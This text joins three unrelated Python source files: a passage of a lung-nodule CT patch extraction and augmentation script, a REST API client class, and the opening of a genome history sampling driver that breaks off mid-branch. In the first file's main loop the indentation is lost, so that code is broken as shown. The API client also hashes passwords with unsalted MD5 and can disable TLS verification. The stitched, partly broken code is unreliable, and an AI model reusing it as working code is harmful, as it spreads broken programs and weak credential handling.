    y_lo, y_hi = int(ycen) - int(yviggla), int(ycen) + int(yviggla)
    z_lo, z_hi = int(zcen) - int(zviggla), int(zcen) + int(zviggla)
    patch = np.zeros(patch_size, dtype=float)
    # Assigning into a pre-sized array forces a shape check, so a window
    # that sticks out of the volume raises instead of silently shrinking.
    patch[:, :, :] = input_np[x_lo:x_hi, y_lo:y_hi, z_lo:z_hi]
    return patch
#########################################################################
#this function does the data augmentation with flipping & rotating
# Seven possible conditions can be generated here
#Number of rotation(1-3) Flip number(1-2)
#########################################################################
def aug_mat(input_3d, aug_type=None, NumberofRotation=None, flipnumber=None):
    """Augment a patch by rotating, flipping, or both.

    np.rot90/np.fliplr/np.flipud act on the first two axes, so the slices
    of a 3D patch are transformed in-plane.

    :param input_3d: numpy array to augment.
    :param aug_type: 'rotate', 'flip', 'both'; anything else returns the
        input unchanged.
    :param NumberofRotation: number of 90-degree rotations (for
        'rotate'/'both').
    :param flipnumber: 1 -> fliplr (left/right), 2 -> flipud (up/down).
    :returns: the transformed array.
    """
    if aug_type == 'rotate':
        return np.rot90(input_3d, NumberofRotation)
    if aug_type == 'flip' and flipnumber == 1:
        return np.fliplr(input_3d)
    if aug_type == 'flip' and flipnumber == 2:
        return np.flipud(input_3d)
    if aug_type == 'both' and flipnumber == 1:
        # NOTE: this also covers ('both', NumberofRotation=2, flipnumber=1).
        # The original code had a more specific branch for that combination
        # (fliplr(flipud(rot90(...)))) *after* this one, but it was
        # unreachable because this condition matches first. The dead branch
        # has been removed; behavior is unchanged.
        return np.fliplr(np.rot90(input_3d, NumberofRotation))
    if aug_type == 'both' and flipnumber == 2:
        return np.flipud(np.rot90(input_3d, NumberofRotation))
    return input_3d
def save_aug_case(pth, matrix):
    """Write the seven flip/rotate augmentations of *matrix* (plus the extra
    'b21' combination) as .npy files whose names start with *pth*."""
    # (suffix, aug_type, NumberofRotation, flipnumber); order matches the
    # original save order.
    recipes = [
        ('_r11', 'rotate', 1, 1),
        ('_r31', 'rotate', 3, 1),
        ('_r21', 'rotate', 2, 1),
        ('_f11', 'flip', 1, 1),
        ('_f12', 'flip', 1, 2),
        ('_b11', 'both', 1, 1),
        ('_b12', 'both', 1, 2),
        ('_b21', 'both', 2, 1),  # added 4/26/2017
    ]
    for suffix, aug_type, n_rot, n_flip in recipes:
        np.save(pth + suffix, aug_mat(matrix, aug_type, n_rot, n_flip))
#########################################################################
#these functions do the data augmentation by applying various
#transformations (combo of rotation, size scaling, horizontal shear)
#########################################################################
#Takes THE RELEVANT SLICES, LOCATION OF NODULE, THEN APPL TRANSFORMATIONS WITH
#DIFFERENT PARAMETERS, AND SAVE THE TRANSFORMED PATCHES;
def crop_relevantSlices(zcen, input_np, patchSize):
    """Return the full x/y slices of the CT volume around slice *zcen*.

    The number of slices kept equals patchSize[2]; the output is float,
    matching the behavior of crop_3d.
    """
    half_depth = patchSize[2] / 2
    z_lo = int(zcen) - int(half_depth)
    z_hi = int(zcen) + int(half_depth)
    out = np.zeros((input_np.shape[0], input_np.shape[1], patchSize[2]),
                   dtype=float)
    # Assignment into a pre-sized array forces a shape check, so an
    # out-of-range zcen raises rather than silently shrinking the crop.
    out[:, :, :] = input_np[:, :, z_lo:z_hi]
    return out
def Aug_trans(relevantSlices, aug_transParams):
    """Write affine-transformed (rotate/scale/shear) patches for one nodule.

    For each parameter row in transParamArray, every slice of
    relevantSlices is rotated, scaled and sheared with skimage.transform;
    the transformed nodule patch is then re-cropped around the transformed
    bounding-box centre and saved as
    <aug_transPath>/<case_id>_mNN.npy (NN = row index).
    """
    #Applies various transformations to full slices containing a nodule, then extracts the transformed nodule,
    #and writes the transformed nodules to an output directory. Transformations are combo of rotation, size scale,
    #& horizontal shear;
    #Inputs: (the last 3 inputs listed below are within fields of aug_transParams)
    #    relevantSlices: full slices of ct containing a particular nodule, type float64, with same number of slices as patchSize[2]
    #    noduleCentroid: array containing centroid info of nodule (row,col,slice); used to locate it within relevantSlices
    #    patchSize: tuple containing patchSize info (3 elements, for height/width/slices)
    #    aug_transPath: pathname of folder to write the transformed nodules into
    #Outputs:
    #    Will write all the transformed patches (based on how many elements in transParamArray) to an output directory
    #Note: scikit.AffineTransform says rotation and shear are in radians, but if I give angle in degrees
    #for rotation (e.g. -90) it will do the correct rotation (i.e. not in radians!!!) For shear it doesn't make any sense
    #what is happening! It just applies horizontal shear, and it is not related to radians at all...
    transParamArray = np.array([[-60, 0.75, -0.15],
                                [60, 1.25, 0.15],
                                [-120, 0.8, -0.2],
                                [120, 1.2, 0.2], #from your 2016 TMI paper, sans the contrast param; rotation/size scale/horizontal shear
                                [30, 1.15, 0.1],
                                [-30, 0.85, -0.1],
                                [-15, 0.9, -0.05],
                                [15, 1.1, 0.05]]) #and 4 new ones
    noduleCentroid = aug_transParams['noduleCentroid']
    patchSize = aug_transParams['patchSize']
    aug_transPath = aug_transParams['aug_transPath']
    case_id = aug_transParams['case_id'] #this is the patient identifier + '_' + (noduleTag - 1)
    centerPoint = np.array((int(noduleCentroid[0]), int(noduleCentroid[1]))) #center point of nodule within the x/y plane: row,col
    #rectPos: 1st two elements are row/col of top left of bbox centered on nodule; is used to find the
    #coordinates of bbox and thereby centerpoint of nodule after the transformation, so that patch can
    #be centered on correct location;
    rectPos = [int(centerPoint[0]-0.5*patchSize[0]), int(centerPoint[1]-0.5*patchSize[1]),
               patchSize[0], patchSize[1]]
    array_int16 = np.zeros((2,2), dtype='int16') #just so that we can use its dtype to make sure relevantSlices also float64
    #centerPoint = np.array((int(rectPos[0]+.5*rectPos[2]), int(rectPos[1]+.5*rectPos[3])))
    for indParamArray in range(transParamArray.shape[0]):
        angle = transParamArray[indParamArray, 0]
        scaleFactor = transParamArray[indParamArray, 1]
        shearFactor = transParamArray[indParamArray, 2]
        #scaleFactor = 1.0
        #shearFactor = 0.2
        #angle = 30
        #rectPos = [348, 296, 50, 50] #actual row/col of top left, and patchSize
        for i in range(relevantSlices.shape[2]):
            #For each slice, apply the current transformation parameters to full slices
            currentSlice = relevantSlices[:,:,i]
            if relevantSlices.dtype == array_int16.dtype:
                #Rotation, etc. turn image into float and normalize to (0,1) if input is not float;
                #In that case, you need to switch back to correct scale so you will need to know min/max;
                #If image is already float, those operations will not affect image and it will retain its original range.
                imageMin = currentSlice.min()
                imageMax = currentSlice.max()
            rotateImage = tf.rotate(currentSlice, angle=angle, resize=True) #note: Unlike matlab version, rotate around center; otherwise output image may clip parts of image
            #rotateFake = tf.rotate(fakeImage, angle=angle, resize=True)
            #rotateImage = tf.rotate(relevantSlices, angle=angle, resize=True, center=(centerPoint[1], centerPoint[0])) #note: center for fn is in matlab image coordinates, not row/col!!
            #rotateFake = tf.rotate(fakeImage, angle=angle, resize=True, center=(centerPoint[1], centerPoint[0]))
            tfScale = tf.AffineTransform(scale=(1.0/scaleFactor, 1.0/scaleFactor)) #for some reason affine trans takes inverse of desired transformation as input
            scaleImage = tf.warp(rotateImage, tfScale, output_shape = (int(scaleFactor*rotateImage.shape[0]), int(scaleFactor*rotateImage.shape[1])))
            #scaleFake = tf.warp(rotateFake, tfScale, output_shape = (int(scaleFactor*rotateImage.shape[0]), int(scaleFactor*rotateImage.shape[1])))
            tfShear = tf.AffineTransform(shear = shearFactor)
            shearImage = tf.warp(scaleImage, tfShear)
            #shearFake = tf.warp(scaleFake, tfShear) #not using the output_size option, somehow the sheared image won't be centered in it
            if i==0: #TO MAKE THINGS RUN FASTER, calculate UPDATED CENTERPOINTNEW ONLY FOR SINGLE SLICE
                # A binary mask the size of one slice, with the nodule bbox
                # set to 1, is pushed through the same transform chain; its
                # transformed extent gives the new bbox/centre used for the
                # final crop of every slice.
                fakeImage = np.zeros((np.shape(currentSlice)[0], np.shape(currentSlice)[1]))
                fakeImage[rectPos[0]:(rectPos[0]+rectPos[2]), rectPos[1]:(rectPos[1]+rectPos[3])] = 1
                rotateFake = tf.rotate(fakeImage, angle=angle, resize=True)
                scaleFake = tf.warp(rotateFake, tfScale, output_shape = (int(scaleFactor*rotateImage.shape[0]), int(scaleFactor*rotateImage.shape[1])))
                shearFake = tf.warp(scaleFake, tfShear) #not using the output_size option, somehow the sheared image won't be centered in it
                shearFake = shearFake.astype('bool')
                [row, col] = np.where(shearFake==1)
                rectPosNew = [min(row), min(col), max(row)-min(row)+1, max(col)-min(col)+1] #this defines the transformed box
                centerPointNew = np.array((int(rectPosNew[0]+.5*rectPosNew[2]), int(rectPosNew[1]+.5*rectPosNew[3]))) #find the center of the box
                #initialize output size in first iteration of loop
                procImage = np.zeros((shearFake.shape[0], shearFake.shape[1], relevantSlices.shape[2]), dtype = 'float64')
            procImage[:,:,i] = shearImage.copy()
            if relevantSlices.dtype == array_int16.dtype:
                #>>>crop_3d fn returns a patch of type float, and a float is what gets written
                #out; so in the end float type is forced, but good to do the conversion back to original dtype
                #(bc rotation, etc result in normalized to 0,1 type float image) before that step for consistency
                procImage[:,:,i] = (imageMin + shearImage * (imageMax-imageMin)).astype('float64')
        cropTrans = np.zeros(patchSize, dtype=float) #this is important; bc crop_3d also does this, & vol is written as float
        cropTrans[:,:,:]=procImage[int(centerPointNew[0]-patchSize[0]/2):int(centerPointNew[0]+patchSize[0]/2), int(centerPointNew[1]-patchSize[1]/2):int(centerPointNew[1]+patchSize[1]/2),:]
        np.save(os.path.join(aug_transPath, case_id + '_m' + "%02d" % (indParamArray,)), cropTrans)
#########################################################################
#ensure_dir
#Creates direcotry if doesnt exist
#########################################################################
def ensure_dir(f):
    """Create directory *f* (including parents) if it does not already exist.

    Uses EAFP instead of an exists() pre-check so that two processes racing
    to create the same directory cannot crash each other.
    """
    try:
        os.makedirs(f)
    except OSError:
        # Swallow only "already exists"; re-raise real failures.
        if not os.path.isdir(f):
            raise
# Create all four output directories up front so the np.save calls in the
# extraction loop cannot fail on a missing directory.
ensure_dir(pos_output_path), ensure_dir(neg_output_path)
ensure_dir(aug_output_path), ensure_dir(aug_aux_output_path)
def calculateintersect(cube1, cube2):
    """Return the overlap volume of two axis-aligned boxes.

    Each argument only needs x/y/z (bbox minima) and x_size/y_size/z_size
    (bbox maxima) attributes, as set up by the can_nudul classes.
    NOTE(review): extents are computed as max - min without the +1 used by
    cal_siz, so boxes that merely share a boundary voxel count as
    non-overlapping — confirm this is intended.
    """
    overlaps = []
    for lo_attr, hi_attr in (('x', 'x_size'), ('y', 'y_size'), ('z', 'z_size')):
        lo = max(getattr(cube1, lo_attr), getattr(cube2, lo_attr))
        hi = min(getattr(cube1, hi_attr), getattr(cube2, hi_attr))
        overlaps.append(max(0, hi - lo))
    return abs(overlaps[0] * overlaps[1] * overlaps[2])
#def path_creat(file_name):
# spl_dir=file_name[:].replace('_','/')
# return spl_dir
# Accumulators for the per-case extraction loop below. NOTE(review):
# neither name is referenced again in the visible portion of this file —
# confirm they are used further down before removing.
nudulsize={}
case_num=1
for case in lidc_case_list: #lidc_case_list has elements like 'p0049_20000101_s3000627.npy'
pos_nodules_in_each_case=[]
mat_dir=lidcPath+path_creat(case)[:-4]
mat_name=mat_pre+case[:-4]+".mat"
if os.path.exists(os.path.join(mat_dir, mat_name)):
mat_contents = sio.loadmat(os.path.join(mat_dir, mat_name))
oct_struct=mat_contents['uniqueStats']
input_3d_npy = np.load(os.path.join(numpy_master_case_path, case))
input_3d_npy = input_3d_npy.astype('int16') #for cases that are uint16
for cases_ind in range(len(mat_contents["uniqueStats"])): #this is looping over nodules in uniqueStats
# print (oct_struct[cases_ind]["CasePath"][0][0].replace('/','_')[31:]+'_'+str(cases_ind) ), #creating unique is for pat
case_id=oct_struct[cases_ind]["CasePath"][0][0].replace('/','_')[len(lidcPath):]+'_'+str(cases_ind)
case_y= oct_struct[cases_ind]["minX"][0][0][0]
case_x= oct_struct[cases_ind]["minY"][0][0][0]
case_z= oct_struct[cases_ind]["minZ"][0][0][0]
case_y_max= oct_struct[cases_ind]["maxX"][0][0][0] # case_n=can_nudul(case_id,cases_ind)
case_x_max= oct_struct[cases_ind]["maxY"][0][0][0]
case_z_max= oct_struct[cases_ind]["maxZ"][0][0][0]
case_y_avg= oct_struct[cases_ind]["avgCentroidX"][0][0][0] #Note that these are switched, e.g. case_Y_avg is avgCentroidX (bc the saved info is in matlab image coordinates)
case_x_avg= oct_struct[cases_ind]["avgCentroidY"][0][0][0]
case_z_avg= oct_struct[cases_ind]["avgCentroidZ"][0][0][0]
case_IURatio=oct_struct[cases_ind]["IURatio"][0][0][0]
my_nudule= can_nudul(case_id,case_x,case_y,case_z,case_x_max,case_y_max,case_z_max,case_x_avg,case_y_avg,case_z_avg,case_IURatio)
#input_3d_npy = np.load(os.path.join(numpy_master_case_path, case))
if my_nudule.IURatio == 0:
print "<3mm lesion, will not extract!"
if my_nudule.IURatio !=0:
# NOTE: Up to and including SPIE, The commented block below had two problems, first: this was
# within the loop adding each nodule info to pos_nodules_in_each_case; the negatives were then
# being extracted within same iteration, based on whether they intersected with current list of nodules
# (they should have been compared against info on ALL nodules); 2nd: if current pos patch could not
# be extracted, the code would have printed an error, but written out an empty array anyway!!!
#print my_nudule.IURatio
# emty_arry = np.zeros(patch_size, dtype=float)
# try:
# emty_arry[:, :, :] = crop_3d(case_x_avg, case_y_avg, case_z_avg, input_3d_npy)
# except:
# print("case",case,"couldn't be made ")
# np.save(pos_output_path + case_id, emty_arry)#saving the nodule itself
# save_aug_case(aug_output_path + case_id, emty_arry)
pos_nodules_in_each_case.append(my_nudule)
    # For every nodule collected above: save the positive (nodule-centred) patch plus
    # augmentations, then scan the volume on a randomised grid for non-overlapping
    # negative patches.
    for currentNodInfo in pos_nodules_in_each_case:
        #for each nodule>3mm that was added to pos_nodules_in_each_case, extract the pos patch;
        #Then use random x,y,z
        #coordinates to define a candidate neg patch; Check the candidate against every nodule coordinates
        #to make sure it has no overlap, if that condition is met extract and save the neg patch;
        #Note: Up to and including SPIE, this was using the avgCentroidZ for z slice, and then random x,y
        emty_arry = np.zeros(patch_size, dtype=float)  # pre-allocated buffer for the positive patch
        try:
            case_x_avg = currentNodInfo.avgCentroidX #row/col/slice of avg centroid
            case_y_avg = currentNodInfo.avgCentroidY
            case_z_avg = currentNodInfo.avgCentroidZ
            case_id = currentNodInfo.case_id
            emty_arry[:, :, :] = crop_3d(case_x_avg, case_y_avg, case_z_avg, input_3d_npy)
            np.save(os.path.join(pos_output_path, case_id), emty_arry)#saving the nodule itself
            save_aug_case(os.path.join(aug_output_path, case_id), emty_arry)
            if transFlag == 1:
                # Optional translation augmentation built from the slices around the centroid
                relevantSlices = crop_relevantSlices(case_z_avg, input_3d_npy, patch_size)
                aug_transParams = {}
                aug_transParams['noduleCentroid'] = np.array((case_x_avg, case_y_avg, case_z_avg))
                aug_transParams['patchSize'] = patch_size
                aug_transParams['aug_transPath'] = aug_aux_output_path
                aug_transParams['case_id'] = case_id
                Aug_trans(relevantSlices, aug_transParams)
        except KeyboardInterrupt:
            print('Manual keyboard interrupt, aborting!')
            sys.exit(0)
        except:
            # NOTE(review): bare except hides the real failure (e.g. crop out of bounds);
            # consider logging sys.exc_info() here.
            print("case",currentNodInfo.case_id,"couldn't be made ") #case_id combines patient identifier & nodule tag -1
            continue
        ind = 1
        #z = currentNodInfo.avgCentroidZ
        # Randomised sparse grid over the whole volume; strides are re-randomised per loop.
        for z in xrange(randint(int(patch_size[2]/2), 30), input_3d_npy.shape[2]-int(patch_size[2]/2),randint(25,50)):
            for y in xrange(randint(int(patch_size[1]/2),50), input_3d_npy.shape[1]-int(patch_size[1]/2), randint(50,150)):
                # NOTE(review): the x start uses patch_size[1] while the stop uses patch_size[0]
                # — looks like a copy/paste slip; confirm intended axis.
                for x in xrange(randint(int(patch_size[1]/2),50), input_3d_npy.shape[0]-int(patch_size[0]/2), randint(50,150)):
                    #window basically has the bbox of the candidate neg patch
                    window = can_nudul_pos_neg(x, y, z, x + patch_size[0], y + patch_size[1],
                                               z + patch_size[2])
                    print x,y,z
                    #flag=False
                    intersection=0 #this is the overal intersection area; for each candidate '-', check against every positive in that case; if no overlap with any, extract.
                    for items in pos_nodules_in_each_case:
                        intersection=int(calculateintersect(window,items)+intersection)
                    if intersection==0:
                        neg_emty_arry=np.zeros(patch_size, dtype=float)
                        try:
                            neg_emty_arry[:, :, :] = crop_3d(x,y,z, input_3d_npy)
                            np.save(os.path.join(neg_output_path, case_id + '_' +str(x)+'_'+str(y)+'_'+str(z)+'_'+ str(ind)), neg_emty_arry)
                            ind += 1
                        except KeyboardInterrupt:
                            print('Manual keyboard interrupt, aborting!')
                            sys.exit(0)
                        except:
                            # NOTE(review): bare except — failed crops are silently skipped
                            print "Selected coordinates for negative patch cannot be cropped",x,y,z
# try:
# ind = 1
# z=case_z_avg
# # for z in xrange(randint(0,40), input_3d_npy.shape[2]-int(patch_size[2]/2),randint(40,60)): # this goes into each case and generates the negative cases
# for y in xrange(randint(0,50), input_3d_npy.shape[1]-int(patch_size[1]/2), randint(50,200)):
# for x in xrange(randint(0,100), input_3d_npy.shape[0]-int(patch_size[0]/2), randint(50,200)):
# window = can_nudul_pos_neg(x, y, z, x + patch_size[0], y + patch_size[1],
# z + patch_size[2])
# print x,y,z
# flag=False
# intersection=0 #this is the overal intersection area; for each candidate '-', check against every positive in that case; if no overlap with any, extract.
# for items in pos_nodules_in_each_case:
# intersection=int(calculateintersect(window,items)+intersection)
# if intersection==0:
# neg_emty_arry=np.zeros(patch_size, dtype=float)
# try:
# neg_emty_arry[:, :, :] = crop_3d(x,y,z, input_3d_npy)
# np.save(neg_output_path + case_id + '_' +str(x)+'_'+str(y)+'_'+str(z)+'_'+ str(ind), neg_emty_arry)
# ind += 1
# except:
# print "selected coordinates wasnt match the input volume size to be croped",x,y,z
# else:
# print ("there is a overlap with posetive case")
# except:
# print case_id, "got error in negatives"
# print sys.exc_info()
| |
"""Comunicating with the API server."""
import json
import logging
import requests
import hashlib
import ast
from requests.auth import HTTPBasicAuth
from urllib.parse import urljoin
from .custom_errors import AuthError
from .custom_errors import KeywordArgument
class BaseAPI(object):
    """Class-level wrapper around a shared requests session for a REST API.

    All connection state (credentials, endpoint, session) is stored on the
    class itself via set_connection(), so subclasses share one configured
    connection. The schema-hint class attributes below drive the value
    coercion performed by payload().
    """

    # Keyword arguments accepted by payload(); subclasses override these.
    keyword_arguments = None
    # Keys whose multi-line string values are split into lists by payload().
    lists = None
    # Keys whose string values are parsed as Python literals (booleans).
    bools = None
    # Keys whose string values are parsed as JSON objects.
    dicts = None

    @classmethod
    def __init__(cls, **kwargs):
        # NOTE(review): __init__ as a classmethod is unusual — every kwarg is
        # stored on the *class*, not an instance. Behaviour preserved; the
        # side-effect list comprehension was replaced with a plain loop.
        for key, value in kwargs.items():
            setattr(cls, key, value)

    @classmethod
    def set_connection(cls, user_name, password, end_point, session_verify):
        """Set the connection settings for the API server.

        :param user_name: the API account user name
        :param password: the API account password
        :param end_point: the API's URL/end point
        :param session_verify: whether to verify the API's TLS certificate
        """
        if not session_verify:
            # Verification disabled: silence urllib3's insecure-request warnings
            requests.packages.urllib3.disable_warnings()
        cls.user_name = user_name
        cls.password = password
        cls.end_point = end_point
        cls.session = requests.Session()
        cls.session.auth = HTTPBasicAuth(user_name, password)
        cls.session.verify = session_verify

    @classmethod
    def _perform_request(cls, url='', request_type='GET', params=None):
        """Perform the real request so callers only customise the "output".

        :param url: path appended to cls.end_point
        :param request_type: 'GET', 'POST', 'DELETE' or 'PUT' (any case)
        :param params: optional payload; JSON-encoded before sending
        :return: the requests response object, or None for an unknown
            request_type (preserved behaviour — pass a known verb)
        :raises AuthError: when the user name or password is unset
        """
        if params:
            params = json.dumps(params)
        # `x is None or not x` collapses to `not x` (None is falsy)
        if not cls.user_name:
            raise AuthError("Missing user name. Please provide a valid user name.")
        if not cls.password:
            raise AuthError("Missing password. Please provide a valid password.")
        url = cls.end_point + url
        method = request_type.upper()  # normalise once instead of per branch
        if method == 'GET':
            return cls.session.get(url, stream=False)
        elif method == 'POST':
            logging.info('{0} - {1}'.format(request_type, params))
            return cls.session.post(url, data=params, stream=False)
        elif method == 'DELETE':
            logging.info('{0} - {1}'.format(request_type, params))
            return cls.session.delete(url, stream=False)
        elif method == 'PUT':
            logging.info('{0} - {1}'.format(request_type, params))
            return cls.session.put(url, data=params, stream=False)

    @classmethod
    def post(cls, uri, payload):
        """Create an item on the Science Logic server.

        :param uri: the URI of the item you wish to create
        :param payload: the payload for the item you wish to create
        :return: the server's response to the POST request
        """
        return cls._perform_request(uri, 'POST', payload)

    @classmethod
    def delete(cls, uri):
        """Delete a record from the API server.

        :param uri: the URI of the item you wish to delete
        :return: the server's response to the DELETE request
        """
        return cls._perform_request(uri, 'DELETE')

    @classmethod
    def get(cls, uri):
        """Get an item by its URI.

        :param uri: the URI of the item you wish to get data for
        :return: the server's response to the GET request
        """
        return cls._perform_request(uri, 'GET')

    @classmethod
    def find(cls, uri='/api/', search_spec='name', search_string='test', extended_fetch=False):
        """Find an item by a filter field (e.g. name) rather than by id.

        :param uri: the URI at which to perform the search
        :param search_spec: the field you are searching by
        :param search_string: the value you are searching for
        :param extended_fetch: True to return full objects instead of just
            the URI and description
        :return: the server's response to the search request
        """
        if extended_fetch:
            options = "?limit=100&hide_filterinfo=1&extended_fetch=1&filter."
        else:
            options = "?limit=100&hide_filterinfo=1&filter."
        search = "{uri}{options}{search_spec}={search_string}".format(
            uri=uri,
            options=options,
            search_spec=search_spec,
            search_string=search_string
        )
        return cls._perform_request(url=search, request_type='GET')

    @classmethod
    def get_uri(cls, uri='/api/', search_spec='name', search_string='test'):
        """Get the URI(s) of matching items as a {description: URI} dict.

        :example:
            response = BaseAPI().get_uri(
                uri='/api/organization',
                search_string='test'
            )
            # -> {'test': '/api/organization/123'}

        :param uri: the URI at which to perform the search
        :param search_spec: the field you are searching by
        :param search_string: the value you are searching for
        :return: dict mapping each result's description to its URI
        """
        response = cls.find(
            uri=uri,
            search_spec=search_spec,
            search_string=search_string,
            extended_fetch=False
        )
        # The old single-result special case built exactly what this loop
        # builds, so one code path now covers 0, 1 or many results (and the
        # response body is only decoded once).
        uri_list = {}
        for value in response.json():
            uri_list[value['description']] = value['URI']
        return uri_list

    @classmethod
    def payload(cls, **kwargs):
        """Create a payload for a POST or PUT request.

        String values are coerced using the class-level schema hints: keys in
        cls.lists are split into lists, keys in cls.bools are parsed with
        ast.literal_eval, keys in cls.dicts are parsed as JSON, and 'passwd'
        is MD5-hashed. Everything else passes through unchanged.

        :raises KeywordArgument: for a kwarg not in cls.keyword_arguments
        :return: dict of the coerced key/value pairs
        """
        payload = {}
        # Default the schema hints so the membership tests below are safe
        if cls.lists is None:
            cls.lists = []
        if cls.bools is None:
            cls.bools = []
        if cls.dicts is None:
            cls.dicts = []
        if cls.keyword_arguments is None:
            cls.keyword_arguments = []
        if not kwargs:
            kwargs = {}
        for key, value in kwargs.items():
            if key not in cls.keyword_arguments:
                # Bug fix: the original had an unreachable `continue` after this raise
                raise KeywordArgument('The keyword argument', key, 'is not supported')
            # Change strings to lists, bools, or dicts based on the hints above
            if key in cls.lists:
                if isinstance(value, str):
                    # One entry per line; leading/trailing commas stripped
                    list_values = [line.strip(',') for line in value.splitlines()]
                else:
                    list_values = [value]
                payload[key] = list_values
            elif key in cls.bools:
                payload[key] = ast.literal_eval(value)
            elif key in cls.dicts:
                payload[key] = json.loads(value)
            elif key == 'passwd':
                # SECURITY: unsalted MD5 is weak; kept because the server expects it
                payload[key] = hashlib.md5(value.encode('utf-8')).hexdigest()
            else:
                payload[key] = value
        return payload

    @classmethod
    def create(cls, uri=None, search_spec=None, search_string=None,
               payload=None, **kwargs):
        """Create an item on the server unless a matching one already exists.

        :return: the POST response when created, otherwise the search response
        """
        exists = cls.find(uri=uri, search_spec=search_spec,
                          search_string=search_string, extended_fetch=False)
        if not exists.json():
            return cls.post(uri, payload)
        return exists

    @classmethod
    def update(cls, uri, search_spec='name', search_string='test', extended_fetch=False,
               **kwargs):
        """Update an item on the server.

        NOTE(review): this POSTs only when the search finds *no* match, which
        looks inverted for an update; behaviour preserved — confirm against
        the API semantics before changing.
        """
        exists = cls.find(uri=uri, search_spec=search_spec, search_string=search_string)
        if not exists.json():
            updates = cls.payload(**kwargs)
            return cls.post(uri, updates)
        return exists

    @classmethod
    def close(cls):
        """Close the shared requests session."""
        cls.session.close()
| |
#!/usr/bin/env python
# Copyright (c) 2012, Daniel Zerbino
# All rights reserved.
#
# (1) Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# (2) Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# (3)The name of the author may not be used to
# endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import sys
import os
import os.path
import argparse
import cPickle as pickle
import random
import glob
import gzip
import cnavg.preprocess.vcf as vcf
import cnavg.preprocess.bambam as bambam
import cnavg.avg.balanced as balancedAVG
import cnavg.cactus.graph as cactus
import cnavg.cactusSampling.sampling as normalized
import cnavg.cactus.oriented as oriented
import cnavg.cactus.balanced as balancedCactus
import cnavg.historySampling.cycleCover as cycleCover
import cnavg.historySampling.sampleGraphCycles as sampleGraphCycles
import cnavg.history.flattened as flattened
import cnavg.history.ordered as ordered
import cnavg.history.debug as debug
from cnavg.history.ordered import prettify
def _parseOptions():
	"""Build the command line parser and return the parsed options (Python 2)."""
	print "Parsing options"
	parser = argparse.ArgumentParser(description="Process a VCF files to sample possible historical explanations")
	# Input data: either a VCF, or BamBam files plus a breaks file and lengths
	parser.add_argument('--vcf', '-v', dest='vcffile', type=file, help='A VCF (ver >= 4.1) file')
	parser.add_argument('--bambam', '-b', dest='bambam', nargs='*', help='BamBam files')
	parser.add_argument('--snps', '-p', dest='snpsfiles', nargs='*', help='SNPs files (optional)')
	parser.add_argument('--index', '-i', dest='index', type=int, help='ID of sampling run')
	parser.add_argument('--breaks', '-k', dest='breaks', type=file, help='A BamBam breaks file')
	parser.add_argument('--lengths', '-l', dest='chromLengths', type=file, help='Chromosome lengths')
	parser.add_argument('--dir', '-d', dest='dir', help='Working directory')
	# Sampling-run behaviour switches
	parser.add_argument('--debug', '-g', dest='debug', action='store_true', help='Debug switch for whatever')
	parser.add_argument('--continue', '-c', dest='cont', action='store_true', help='Continue sampling for 24 hours')
	parser.add_argument('--integer', '-n', dest='integer', action='store_true', help='Integer switch for idealized integer histories')
	parser.add_argument('--simulation', dest='simulation', action='store_true', help='Simuated histories')
	parser.add_argument('--tabbed', dest='tabbed', action='store_true', help='Tabbed BamBam breakend file')
	parser.add_argument('--size', '-s', dest='size', type=int, default=100, help='Number of sampled histories')
	parser.add_argument('--temp', '-t', dest='temp', type=float, default=1, help='Starting temperature of MCMC sampling')
	return parser.parse_args()
def _parseGraph(options):
	"""Parse the input files into breakends and return their AVG.

	Prefers BamBam input (files + breaks + chromosome lengths); falls back to
	VCF + chromosome lengths. Exits after listing what is missing when
	neither combination is complete.
	"""
	print "Parsing input files"
	if options.bambam is not None and options.breaks is not None and options.chromLengths is not None:
		# Expand possible shell globs in the BamBam file list
		options.bambam = sum(map(glob.glob, options.bambam), [])
		assert len(options.bambam) > 0, options.bambam
		breakends = bambam.parse(options.bambam, options.breaks, options.chromLengths, snpsfiles=options.snpsfiles, tabbed=options.tabbed)
	elif options.vcffile is not None and options.chromLengths is not None:
		breakends = vcf.parse(options.vcffile, options.chromLengths)
	else:
		# Report which required inputs are present/missing, then abort
		if options.vcffile is None:
			print "No VCF"
		else:
			print "VCF: %s" % options.vcffile
		if options.chromLengths is None:
			print "No chromosome lengths"
		else:
			print "Chromosome lengths: %s" % options.chromLengths
		if options.bambam is None:
			print "No BamBam files"
		else:
			print "BamBam files: %s" % options.bambam
		if options.breaks is None:
			print "No BamBam break file"
		else:
			print "Breaks lengths: %s" % options.breaks
		sys.exit("Not enough files")
	breakends.validate()
	return breakends.avg()
def main():
	"""Two-phase driver keyed on --index.

	Without --index: parse inputs, build the balanced AVG and cactus graph,
	and pickle it to 'CACTUS'. With --index: (re)load a cactus, sample
	histories, and progressively write stats/pickle/braney output files.
	"""
	options = _parseOptions()
	sampleGraphCycles.TEMPERATURE = options.temp
	if options.dir is not None:
		if not os.path.exists(options.dir):
			os.mkdir(options.dir)
		os.chdir(options.dir)
	if options.simulation:
		debug.RATIO_TO_OFFSET = False
	if options.index is None:
		## Initial graph construction
		G = _parseGraph(options)
		B = balancedAVG.BalancedAVG(G)
		C = cactus.Cactus(B)
		pickle.dump(C, open('CACTUS', "wb"))
	else:
		H = None
		if options.debug:
			## Picking up from where we started
			OC = pickle.load(open('CACTUS_%i' % options.index))
			random.setstate(pickle.load(open("STATE_%i" % options.index)))
		elif options.cont:
			## Picking up from where we stopped
